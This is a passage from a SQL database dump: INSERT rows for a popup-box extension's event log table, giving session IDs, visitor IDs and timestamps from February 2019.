(58807, '4010cf571b917a81a147f84e95b73a60', 'a8526f6e757f5fda', 0, 2, 1, '2019-02-11 22:28:02'),
(58808, '4010cf571b917a81a147f84e95b73a60', 'a8526f6e757f5fda', 0, 2, 1, '2019-02-11 22:28:28'),
(58809, '7e810fa3b8887de77c9f5e85ab93d1ca', '2ac5721d4919f263', 0, 2, 1, '2019-02-11 22:30:54'),
(58810, '4010cf571b917a81a147f84e95b73a60', 'a8526f6e757f5fda', 0, 2, 1, '2019-02-11 22:31:53'),
(58811, '7e810fa3b8887de77c9f5e85ab93d1ca', '2ac5721d4919f263', 0, 2, 1, '2019-02-11 22:32:06'),
(58812, 'b3731aab866a8e1a7dcd31d4d2029ddd', 'a241b97c40d2b2c5', 0, 2, 1, '2019-02-11 22:32:26'),
(58813, 'b49483207f2268c6547a3bde0a721555', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 22:32:37'),
(58814, 'b576e195a3c3e107fee622b1d98eb09c', '9ead839ed439c136', 0, 2, 1, '2019-02-11 22:32:41'),
(58815, '4010cf571b917a81a147f84e95b73a60', 'a8526f6e757f5fda', 0, 2, 1, '2019-02-11 22:33:10'),
(58816, 'e7e5caaa69a3626e14d1bf2e90416fb1', '2ac5721d4919f263', 0, 2, 1, '2019-02-11 22:35:58'),
(58817, '4d27f65ff46a48f44b54fb8b1dfc4872', '44350c872ecd4b7e', 0, 2, 1, '2019-02-11 22:37:19'),
(58818, '249bb70f66f9c1bbac9b99d8bb501d2e', 'c020abbb40884763', 0, 2, 1, '2019-02-11 22:42:33'),
(58819, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-11 22:46:26'),
(58820, 'b49483207f2268c6547a3bde0a721555', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 22:46:31'),
(58821, '41051906262bfaad8c316d52c62fb6d0', 'cdcd449d36198205', 0, 2, 1, '2019-02-11 22:46:37'),
(58822, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 22:46:38'),
(58823, 'b3731aab866a8e1a7dcd31d4d2029ddd', 'a241b97c40d2b2c5', 0, 2, 1, '2019-02-11 22:46:49'),
(58824, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-11 22:47:13'),
(58825, 'b49483207f2268c6547a3bde0a721555', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 22:47:15'),
(58826, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-11 22:47:33'),
(58827, 'ab7d81e148d37e55f58871c790af6272', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-11 22:47:35'),
(58828, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-11 22:47:36'),
(58829, '4fee204a30c655d61a02b5f1d182100d', '14d059e5da6bdba4', 0, 2, 1, '2019-02-11 22:47:39'),
(58830, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-11 22:47:52'),
(58831, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-11 22:48:41'),
(58832, '31fa9c0925087cde3752f76f4823a2d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-11 22:49:44'),
(58833, 'a11be8e066603f6af0f25de996fb618c', '81180a135636ee24', 0, 2, 1, '2019-02-11 22:50:57'),
(58834, '31fa9c0925087cde3752f76f4823a2d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-11 22:51:17'),
(58835, '1fdf1b5b2a64b26c4b1026d305591eb3', '2ac5721d4919f263', 0, 2, 1, '2019-02-11 22:52:01'),
(58836, '1fdf1b5b2a64b26c4b1026d305591eb3', '2ac5721d4919f263', 0, 2, 1, '2019-02-11 22:53:47'),
(58837, 'ecb3199cbdaa4d67cf440dd14accb3a5', 'dbdb97337481880b', 0, 2, 1, '2019-02-11 22:55:05'),
(58838, 'a85bd92f275748fbfe48b52246755dc2', 'e706e9a0184b2202', 0, 2, 1, '2019-02-11 22:59:30'),
(58839, 'a85bd92f275748fbfe48b52246755dc2', 'e706e9a0184b2202', 0, 2, 1, '2019-02-11 23:01:28'),
(58840, '249bb70f66f9c1bbac9b99d8bb501d2e', 'c020abbb40884763', 0, 2, 1, '2019-02-11 23:03:28'),
(58841, '778377bc36683da53edd7d4d6e44b41e', '58bf48290abf8cbc', 0, 2, 1, '2019-02-11 23:05:03'),
(58842, '82f1b657103e891dc51e9bc47087b74b', '4c8d57f1ea3e9071', 0, 2, 1, '2019-02-11 23:05:05'),
(58843, '9ac4f843dfb83f88b0f2b2d9ba79ddea', 'afde4924661f41e4', 0, 2, 1, '2019-02-11 23:05:24'),
(58844, '4d27f65ff46a48f44b54fb8b1dfc4872', '44350c872ecd4b7e', 0, 2, 1, '2019-02-11 23:09:12'),
(58845, 'de3ff209b8bdab0836bab8c0002ee0fd', '6b726538fbbfb63b', 0, 2, 1, '2019-02-11 23:17:54'),
(58846, '778377bc36683da53edd7d4d6e44b41e', '58bf48290abf8cbc', 0, 2, 1, '2019-02-11 23:18:20'),
(58847, '31fa9c0925087cde3752f76f4823a2d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-11 23:19:47'),
(58848, 'd43c4a7f27ae361a3973d2cfc769632b', 'e7c1ea6bb18dca13', 0, 2, 1, '2019-02-11 23:21:47'),
(58849, '5cc70c031e517e02ba3df1c0a77c418f', '5c5e2b57fcb5351b', 0, 2, 1, '2019-02-11 23:23:29'),
(58850, '38904403e71b6a6db87e49e2a9ff0844', 'e60060f4de8f73bd', 0, 2, 1, '2019-02-11 23:25:12'),
(58851, '95758825d0fc767a33693e2a5d158c9f', 'c7d4ce8b0de12339', 0, 2, 1, '2019-02-11 23:27:11'),
(58852, 'dd45926f9c67c5075792d95df64b4530', '0a559c10b3b303ca', 0, 2, 1, '2019-02-11 23:30:47'),
(58853, '49ba8ceeeb9d03393967deacb7b2dbc7', '680475ba14453a0c', 0, 2, 1, '2019-02-11 23:33:18'),
(58854, '61c4389aeb9cfba5a74981c8e0e977ce', '7501b42c35accff7', 0, 2, 1, '2019-02-11 23:36:20'),
(58855, 'feb2dc1d803e7debc730677b64499b16', '943c757e2d6b5b77', 0, 2, 1, '2019-02-11 23:52:10'),
(58856, '7fdec7c5c4b1f575d621f4c9393360db', '270788827ced3694', 0, 2, 1, '2019-02-11 23:53:16'),
(58857, '2d62570cfcff569e8fb531eb07fc9cff', 'cdcd449d36198205', 0, 2, 1, '2019-02-12 00:06:47'),
(58858, 'feb2dc1d803e7debc730677b64499b16', '943c757e2d6b5b77', 0, 2, 1, '2019-02-12 00:07:51'),
(58859, 'de3ff209b8bdab0836bab8c0002ee0fd', '6b726538fbbfb63b', 0, 2, 1, '2019-02-12 00:08:51'),
(58860, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-12 00:09:08'),
(58861, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:09:12'),
(58862, 'b49483207f2268c6547a3bde0a721555', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:09:14'),
(58863, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:09:30'),
(58864, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:09:32'),
(58865, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:09:46'),
(58866, 'b49483207f2268c6547a3bde0a721555', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:09:54'),
(58867, 'de3ff209b8bdab0836bab8c0002ee0fd', '6b726538fbbfb63b', 0, 2, 1, '2019-02-12 00:09:55'),
(58868, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:09:56'),
(58869, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:10:03'),
(58870, '778377bc36683da53edd7d4d6e44b41e', '58bf48290abf8cbc', 0, 2, 1, '2019-02-12 00:10:04'),
(58871, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-12 00:10:13'),
(58872, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:10:18'),
(58873, '2d62570cfcff569e8fb531eb07fc9cff', 'cdcd449d36198205', 0, 2, 1, '2019-02-12 00:10:19'),
(58874, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:10:23'),
(58875, 'de3ff209b8bdab0836bab8c0002ee0fd', '6b726538fbbfb63b', 0, 2, 1, '2019-02-12 00:10:30'),
(58876, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:10:40'),
(58877, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:10:47'),
(58878, 'de3ff209b8bdab0836bab8c0002ee0fd', '6b726538fbbfb63b', 0, 2, 1, '2019-02-12 00:10:48'),
(58879, '2d62570cfcff569e8fb531eb07fc9cff', 'cdcd449d36198205', 0, 2, 1, '2019-02-12 00:11:07'),
(58880, 'b49483207f2268c6547a3bde0a721555', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:11:17'),
(58881, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:11:22'),
(58882, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:11:26'),
(58883, '6282a3c2b340e0291f8d0a0d30ec29cf', 'abc5ec7aefe03208', 0, 2, 1, '2019-02-12 00:11:32'),
(58884, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:11:42'),
(58885, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:11:43'),
(58886, 'de3ff209b8bdab0836bab8c0002ee0fd', '6b726538fbbfb63b', 0, 2, 1, '2019-02-12 00:11:48'),
(58887, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-12 00:11:48'),
(58888, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:11:52'),
(58889, '7fdec7c5c4b1f575d621f4c9393360db', '270788827ced3694', 0, 2, 1, '2019-02-12 00:12:04'),
(58890, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:12:10'),
(58891, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:12:18'),
(58892, 'de3ff209b8bdab0836bab8c0002ee0fd', '6b726538fbbfb63b', 0, 2, 1, '2019-02-12 00:12:20'),
(58893, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:12:26'),
(58894, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:12:36'),
(58895, 'de3ff209b8bdab0836bab8c0002ee0fd', '6b726538fbbfb63b', 0, 2, 1, '2019-02-12 00:12:36'),
(58896, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:12:41'),
(58897, '6282a3c2b340e0291f8d0a0d30ec29cf', 'abc5ec7aefe03208', 0, 2, 1, '2019-02-12 00:12:47'),
(58898, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:13:04'),
(58899, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:13:10'),
(58900, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:13:13'),
(58901, '5cc70c031e517e02ba3df1c0a77c418f', '5c5e2b57fcb5351b', 0, 2, 1, '2019-02-12 00:13:17'),
(58902, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:13:46'),
(58903, '6282a3c2b340e0291f8d0a0d30ec29cf', 'abc5ec7aefe03208', 0, 2, 1, '2019-02-12 00:13:50'),
(58904, 'a85bd92f275748fbfe48b52246755dc2', 'e706e9a0184b2202', 0, 2, 1, '2019-02-12 00:13:54'),
(58905, 'b49483207f2268c6547a3bde0a721555', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:14:00'),
(58906, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:14:42'),
(58907, 'aaa730c4258a4a55ab5aebdcd7afbcef', '1e8786f2f88c192b', 0, 2, 1, '2019-02-12 00:14:46'),
(58908, '42c6e32fc7ecea7b3ea3a10ee29599a4', 'e793b6887430710e', 0, 2, 1, '2019-02-12 00:15:14'),
(58909, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-12 00:15:20'),
(58910, '42c6e32fc7ecea7b3ea3a10ee29599a4', 'e793b6887430710e', 0, 2, 1, '2019-02-12 00:15:42'),
(58911, 'c3c4920b9bc35b4e4bb20b31d8507af7', '3c0ef43b583fe622', 0, 2, 1, '2019-02-12 00:15:43'),
(58912, 'c3c4920b9bc35b4e4bb20b31d8507af7', '3c0ef43b583fe622', 0, 2, 1, '2019-02-12 00:16:07'),
(58913, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:16:10'),
(58914, '6282a3c2b340e0291f8d0a0d30ec29cf', 'abc5ec7aefe03208', 0, 2, 1, '2019-02-12 00:16:13'),
(58915, '5cc70c031e517e02ba3df1c0a77c418f', '5c5e2b57fcb5351b', 0, 2, 1, '2019-02-12 00:16:18'),
(58916, '7fdec7c5c4b1f575d621f4c9393360db', '270788827ced3694', 0, 2, 1, '2019-02-12 00:16:23'),
(58917, 'c3c4920b9bc35b4e4bb20b31d8507af7', '3c0ef43b583fe622', 0, 2, 1, '2019-02-12 00:16:35'),
(58918, 'de3ff209b8bdab0836bab8c0002ee0fd', '6b726538fbbfb63b', 0, 2, 1, '2019-02-12 00:16:44'),
(58919, 'c3c4920b9bc35b4e4bb20b31d8507af7', '3c0ef43b583fe622', 0, 2, 1, '2019-02-12 00:17:00'),
(58920, 'de3ff209b8bdab0836bab8c0002ee0fd', '6b726538fbbfb63b', 0, 2, 1, '2019-02-12 00:17:08'),
(58921, 'c3c4920b9bc35b4e4bb20b31d8507af7', '3c0ef43b583fe622', 0, 2, 1, '2019-02-12 00:17:13'),
(58922, 'c3c4920b9bc35b4e4bb20b31d8507af7', '3c0ef43b583fe622', 0, 2, 1, '2019-02-12 00:17:28'),
(58923, 'c3c4920b9bc35b4e4bb20b31d8507af7', '3c0ef43b583fe622', 0, 2, 1, '2019-02-12 00:17:50'),
(58924, '093326d7ac6ea1bb138ef3b691294119', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:17:56'),
(58925, 'c3c4920b9bc35b4e4bb20b31d8507af7', '3c0ef43b583fe622', 0, 2, 1, '2019-02-12 00:18:01'),
(58926, '897fd89b2e4e2352e25d4a063ff690d1', '932e93c57311c1b1', 0, 2, 1, '2019-02-12 00:18:11'),
(58927, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:18:20'),
(58928, '093326d7ac6ea1bb138ef3b691294119', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:18:25'),
(58929, '897fd89b2e4e2352e25d4a063ff690d1', '932e93c57311c1b1', 0, 2, 1, '2019-02-12 00:18:28'),
(58930, '321274b8b25fe933a9566bb93d5052a6', 'afebc76df87678b1', 0, 2, 1, '2019-02-12 00:18:39'),
(58931, '983e33f6754a69f8fdf4df5704160509', '2ac5721d4919f263', 0, 2, 1, '2019-02-12 00:18:46'),
(58932, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-12 00:18:50'),
(58933, '093326d7ac6ea1bb138ef3b691294119', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:18:59'),
(58934, '897fd89b2e4e2352e25d4a063ff690d1', '932e93c57311c1b1', 0, 2, 1, '2019-02-12 00:19:14'),
(58935, '8a02d89d4592c4a16b68ecc14fee3370', '178318c93a275357', 0, 2, 1, '2019-02-12 00:19:16'),
(58936, '093326d7ac6ea1bb138ef3b691294119', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:19:28'),
(58937, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:19:52'),
(58938, '6282a3c2b340e0291f8d0a0d30ec29cf', 'abc5ec7aefe03208', 0, 2, 1, '2019-02-12 00:20:06'),
(58939, '093326d7ac6ea1bb138ef3b691294119', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:20:24'),
(58940, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-12 00:20:27'),
(58941, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:20:41'),
(58942, '093326d7ac6ea1bb138ef3b691294119', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:20:46'),
(58943, 'c3c4920b9bc35b4e4bb20b31d8507af7', '3c0ef43b583fe622', 0, 2, 1, '2019-02-12 00:21:03'),
(58944, '983e33f6754a69f8fdf4df5704160509', '2ac5721d4919f263', 0, 2, 1, '2019-02-12 00:21:07'),
(58945, '897fd89b2e4e2352e25d4a063ff690d1', '932e93c57311c1b1', 0, 2, 1, '2019-02-12 00:21:21'),
(58946, '093326d7ac6ea1bb138ef3b691294119', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:21:34'),
(58947, '093326d7ac6ea1bb138ef3b691294119', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:21:41'),
(58948, '897fd89b2e4e2352e25d4a063ff690d1', '932e93c57311c1b1', 0, 2, 1, '2019-02-12 00:21:42'),
(58949, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:21:45'),
(58950, 'a85bd92f275748fbfe48b52246755dc2', 'e706e9a0184b2202', 0, 2, 1, '2019-02-12 00:22:09'),
(58951, '093326d7ac6ea1bb138ef3b691294119', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:22:12'),
(58952, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:22:17'),
(58953, 'c3c4920b9bc35b4e4bb20b31d8507af7', '3c0ef43b583fe622', 0, 2, 1, '2019-02-12 00:22:36'),
(58954, '093326d7ac6ea1bb138ef3b691294119', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:22:36'),
(58955, 'c3c4920b9bc35b4e4bb20b31d8507af7', '3c0ef43b583fe622', 0, 2, 1, '2019-02-12 00:22:55'),
(58956, '9ac4f843dfb83f88b0f2b2d9ba79ddea', 'afde4924661f41e4', 0, 2, 1, '2019-02-12 00:22:55'),
(58957, '6282a3c2b340e0291f8d0a0d30ec29cf', 'abc5ec7aefe03208', 0, 2, 1, '2019-02-12 00:22:55'),
(58958, 'c3c4920b9bc35b4e4bb20b31d8507af7', '3c0ef43b583fe622', 0, 2, 1, '2019-02-12 00:23:01'),
(58959, '5cc70c031e517e02ba3df1c0a77c418f', '5c5e2b57fcb5351b', 0, 2, 1, '2019-02-12 00:23:02'),
(58960, 'c3c4920b9bc35b4e4bb20b31d8507af7', '3c0ef43b583fe622', 0, 2, 1, '2019-02-12 00:23:18'),
(58961, '860be9dc1267a109c27b9d8b87ba00c5', '6acd603860f9a799', 0, 2, 1, '2019-02-12 00:23:19'),
(58962, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-12 00:23:25'),
(58963, '5cc70c031e517e02ba3df1c0a77c418f', '5c5e2b57fcb5351b', 0, 2, 1, '2019-02-12 00:23:25'),
(58964, '897fd89b2e4e2352e25d4a063ff690d1', '932e93c57311c1b1', 0, 2, 1, '2019-02-12 00:23:30'),
(58965, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:23:44'),
(58966, '70807274494d78c4903cd59c50abb2ce', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:24:05'),
(58967, '897fd89b2e4e2352e25d4a063ff690d1', '932e93c57311c1b1', 0, 2, 1, '2019-02-12 00:24:14'),
(58968, '70807274494d78c4903cd59c50abb2ce', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:24:23'),
(58969, '70807274494d78c4903cd59c50abb2ce', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:24:35'),
(58970, '860be9dc1267a109c27b9d8b87ba00c5', '6acd603860f9a799', 0, 2, 1, '2019-02-12 00:24:35'),
(58971, '9ac4f843dfb83f88b0f2b2d9ba79ddea', 'afde4924661f41e4', 0, 2, 1, '2019-02-12 00:24:39'),
(58972, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-12 00:24:39'),
(58973, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:24:56'),
(58974, '9ac4f843dfb83f88b0f2b2d9ba79ddea', 'afde4924661f41e4', 0, 2, 1, '2019-02-12 00:24:58'),
(58975, '983e33f6754a69f8fdf4df5704160509', '2ac5721d4919f263', 0, 2, 1, '2019-02-12 00:25:03'),
(58976, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-12 00:25:04'),
(58977, 'c3c4920b9bc35b4e4bb20b31d8507af7', '3c0ef43b583fe622', 0, 2, 1, '2019-02-12 00:25:08'),
(58978, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-12 00:25:14'),
(58979, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-12 00:25:29'),
(58980, '5cc70c031e517e02ba3df1c0a77c418f', '5c5e2b57fcb5351b', 0, 2, 1, '2019-02-12 00:25:31'),
(58981, '698557d9ec631e38952ba5db68eb5850', 'ddcd269428326cc0', 0, 2, 1, '2019-02-12 00:25:42'),
(58982, '70807274494d78c4903cd59c50abb2ce', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:25:52'),
(58983, '6282a3c2b340e0291f8d0a0d30ec29cf', 'abc5ec7aefe03208', 0, 2, 1, '2019-02-12 00:25:55'),
(58984, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-12 00:26:16'),
(58985, '5cc70c031e517e02ba3df1c0a77c418f', '5c5e2b57fcb5351b', 0, 2, 1, '2019-02-12 00:26:23'),
(58986, '698557d9ec631e38952ba5db68eb5850', 'ddcd269428326cc0', 0, 2, 1, '2019-02-12 00:26:38'),
(58987, '2d62570cfcff569e8fb531eb07fc9cff', 'cdcd449d36198205', 0, 2, 1, '2019-02-12 00:26:38'),
(58988, 'eb01c314cbe659f4a44106a98ff09ecc', '2ac5721d4919f263', 0, 2, 1, '2019-02-12 00:26:53'),
(58989, '7fdec7c5c4b1f575d621f4c9393360db', '270788827ced3694', 0, 2, 1, '2019-02-12 00:26:55'),
(58990, '698557d9ec631e38952ba5db68eb5850', 'ddcd269428326cc0', 0, 2, 1, '2019-02-12 00:26:58'),
(58991, '6282a3c2b340e0291f8d0a0d30ec29cf', 'abc5ec7aefe03208', 0, 2, 1, '2019-02-12 00:27:25'),
(58992, 'de3ff209b8bdab0836bab8c0002ee0fd', '6b726538fbbfb63b', 0, 2, 1, '2019-02-12 00:28:10'),
(58993, 'de3ff209b8bdab0836bab8c0002ee0fd', '6b726538fbbfb63b', 0, 2, 1, '2019-02-12 00:28:28'),
(58994, '249bb70f66f9c1bbac9b99d8bb501d2e', 'c020abbb40884763', 0, 2, 1, '2019-02-12 00:28:46'),
(58995, 'c195b870c6e5370f31d626deca7bc8a5', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-12 00:28:52'),
(58996, 'a85bd92f275748fbfe48b52246755dc2', 'e706e9a0184b2202', 0, 2, 1, '2019-02-12 00:28:52'),
(58997, '98289917ae4c72845d0e1d4b2c723945', '008504cb0c0d221d', 0, 2, 1, '2019-02-12 00:30:38'),
(58998, '897fd89b2e4e2352e25d4a063ff690d1', '932e93c57311c1b1', 0, 2, 1, '2019-02-12 00:31:34'),
(58999, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-12 00:34:47'),
(59000, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-12 00:34:58'),
(59001, '70807274494d78c4903cd59c50abb2ce', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:35:02'),
(59002, '4d27f65ff46a48f44b54fb8b1dfc4872', '44350c872ecd4b7e', 0, 2, 1, '2019-02-12 00:35:09'),
(59003, '61c4389aeb9cfba5a74981c8e0e977ce', '7501b42c35accff7', 0, 2, 1, '2019-02-12 00:35:36'),
(59004, 'ba09227baed82b7ef5dec5253a875fc6', '8e0589df61cad931', 0, 2, 1, '2019-02-12 00:36:42'),
(59005, '98289917ae4c72845d0e1d4b2c723945', '008504cb0c0d221d', 0, 2, 1, '2019-02-12 00:36:57'),
(59006, '6282a3c2b340e0291f8d0a0d30ec29cf', 'abc5ec7aefe03208', 0, 2, 1, '2019-02-12 00:37:00'),
(59007, '70807274494d78c4903cd59c50abb2ce', 'df27b9a2919a8206', 0, 2, 1, '2019-02-12 00:37:17'),
(59008, '4d27f65ff46a48f44b54fb8b1dfc4872', '44350c872ecd4b7e', 0, 2, 1, '2019-02-12 00:37:38'),
(59009, 'de3ff209b8bdab0836bab8c0002ee0fd', '6b726538fbbfb63b', 0, 2, 1, '2019-02-12 00:37:41'),
(59010, '778377bc36683da53edd7d4d6e44b41e', '58bf48290abf8cbc', 0, 2, 1, '2019-02-12 00:37:45'),
(59011, '7fdec7c5c4b1f575d621f4c9393360db', '270788827ced3694', 0, 2, 1, '2019-02-12 00:38:57'),
(59012, '860be9dc1267a109c27b9d8b87ba00c5', '6acd603860f9a799', 0, 2, 1, '2019-02-12 00:39:50'),
(59013, 'a85bd92f275748fbfe48b52246755dc2', 'e706e9a0184b2202', 0, 2, 1, '2019-02-12 00:40:47'),
(59014, '8672a3780296bca7ebcda1030e33561a', '0bf16c319bd2f666', 0, 2, 1, '2019-02-12 00:41:35'),
(59015, '4d27f65ff46a48f44b54fb8b1dfc4872', '44350c872ecd4b7e', 0, 2, 1, '2019-02-12 00:44:04'),
(59016, '698557d9ec631e38952ba5db68eb5850', 'ddcd269428326cc0', 0, 2, 1, '2019-02-12 00:44:26'),
(59017, '19e3f32fe01f51cee58c7ded1e31761e', '81aa20345d9cca6d', 0, 2, 1, '2019-02-12 00:45:41'),
(59018, '19e3f32fe01f51cee58c7ded1e31761e', '81aa20345d9cca6d', 0, 2, 1, '2019-02-12 00:46:42'),
(59019, '31fa9c0925087cde3752f76f4823a2d7', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-12 00:50:30'),
(59020, 'd8ecfa3f760264dd00ffff7069238c8f', 'b2bafb74467116e9', 0, 2, 1, '2019-02-12 00:52:28'),
(59021, 'd8ecfa3f760264dd00ffff7069238c8f', 'b2bafb74467116e9', 0, 2, 1, '2019-02-12 00:52:34'),
(59022, 'aaa730c4258a4a55ab5aebdcd7afbcef', '1e8786f2f88c192b', 0, 2, 1, '2019-02-12 00:56:37'),
(59023, 'eb01c314cbe659f4a44106a98ff09ecc', '2ac5721d4919f263', 0, 2, 1, '2019-02-12 00:57:34'),
(59024, '473dedc7db23313c3d35f090da8a044f', 'fd9e13a25e929cea', 0, 2, 1, '2019-02-12 01:00:11'),
(59025, '473dedc7db23313c3d35f090da8a044f', 'fd9e13a25e929cea', 0, 2, 1, '2019-02-12 01:03:40'),
(59026, '473dedc7db23313c3d35f090da8a044f', 'fd9e13a25e929cea', 0, 2, 1, '2019-02-12 01:03:47'),
(59027, '473dedc7db23313c3d35f090da8a044f', 'fd9e13a25e929cea', 0, 2, 1, '2019-02-12 01:04:07');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(59028, '473dedc7db23313c3d35f090da8a044f', 'fd9e13a25e929cea', 0, 2, 1, '2019-02-12 01:04:26'),
(59029, '3d89655cd81430c286d2aac490ed1f0b', '1b466b565be60765', 0, 2, 1, '2019-02-12 01:06:18'),
(59030, 'eb01c314cbe659f4a44106a98ff09ecc', '2ac5721d4919f263', 0, 2, 1, '2019-02-12 01:08:02'),
(59031, '7de0500c58a89af519453fd4ae4f576d', '679c2311f97bf8cf', 0, 2, 1, '2019-02-12 01:18:20'),
(59032, 'eb01c314cbe659f4a44106a98ff09ecc', '2ac5721d4919f263', 0, 2, 1, '2019-02-12 01:21:04'),
